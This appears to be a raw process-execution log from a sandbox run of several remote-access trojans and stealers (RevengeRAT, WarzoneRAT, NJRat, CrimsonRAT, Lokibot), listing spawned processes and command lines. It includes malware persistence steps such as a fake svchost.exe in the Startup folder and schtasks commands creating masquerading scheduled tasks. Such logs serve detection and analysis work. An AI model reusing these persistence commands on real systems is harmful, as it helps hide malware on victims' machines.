C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA017A8419484B8D8B90E2C4CECD7478.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qtkkcsoi.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AA0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEB314D6972554CC1ADFB94284741336E.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s5xpbss5.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B2C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2E1AF3E18D5C458892FD4C6DAE64FB33.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e83zhpn-.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc435E2A9456154AB1948334CB999B6D4E.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v6wjos64.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CE2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAE32FB188E174C1D8451C982D7DBB859.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lssic93r.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D8E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3AE81288C6A342DCA3811C9DE3376AB6.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\p2xfrlyp.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF4411FC84674D9CB26AC08F59DD927.TMP"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0h74oqkv.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F05.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3EA38C6087E14075BBB98CD5B342E439.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\u2mlauku.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FB1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc872ECB81EF08488A8DA4ED8F2FDE419D.TMP"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k9hci6sr.cmdline"
C:\Users\Admin\Downloads\RevengeRAT.exe
"C:\Users\Admin\Downloads\RevengeRAT.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2382.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc93A56BFC9A364F6897E537AE9FD750D7.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7d0hc2ze.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Users\Admin\Downloads\RevengeRAT.exe
"C:\Users\Admin\Downloads\RevengeRAT.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2509.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBDBC547E71AF4EEE82D1DB7A4BFC6E77.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xryfkc4b.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2632.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF9214ACF9754D6799B4AC2A1B59DDE.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jaaeswpo.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES26BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D070CE68711455BA883044FA7020D0.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d8i7emlc.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2789.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD4C4595BBF464ABD9E10A9789A5F494B.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\13ht2sct.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28B2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCAEAB3E128344752827B62C5E9713D47.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zq_o7xz4.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES298D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB007BC9CD6BE4DAA94A684C83C6A3F13.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2y6t-vbb.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A58.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA6B28D28D88A461D9E6D9C6626EBA454.TMP"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fdm3hj0s.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B23.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1CAC5829FED8455CBEAB5AC574FA66E8.TMP"
C:\Users\Admin\Downloads\WarzoneRAT.exe
"C:\Users\Admin\Downloads\WarzoneRAT.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e0hqya2n.cmdline"
C:\Users\Admin\Downloads\WarzoneRAT.exe
"C:\Users\Admin\Downloads\WarzoneRAT.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BEE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8EBBAFA518BD4FC4ADED4FCA5AAE18B6.TMP"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2BCF.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2C7B.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
C:\Users\Admin\Downloads\NJRat.exe
"C:\Users\Admin\Downloads\NJRat.exe"
C:\Users\Admin\Downloads\CrimsonRAT.exe
"C:\Users\Admin\Downloads\CrimsonRAT.exe"
C:\Users\Admin\Downloads\CrimsonRAT.exe
"C:\Users\Admin\Downloads\CrimsonRAT.exe"
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
C:\Users\Admin\Downloads\Lokibot.exe
"C:\Users\Admin\Downloads\Lokibot.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8748 /prefetch:1
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
C:\Users\Admin\Downloads\DeltaExecutor\DeltaExecutor.exe
"C:\Users\Admin\Downloads\DeltaExecutor\DeltaExecutor.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
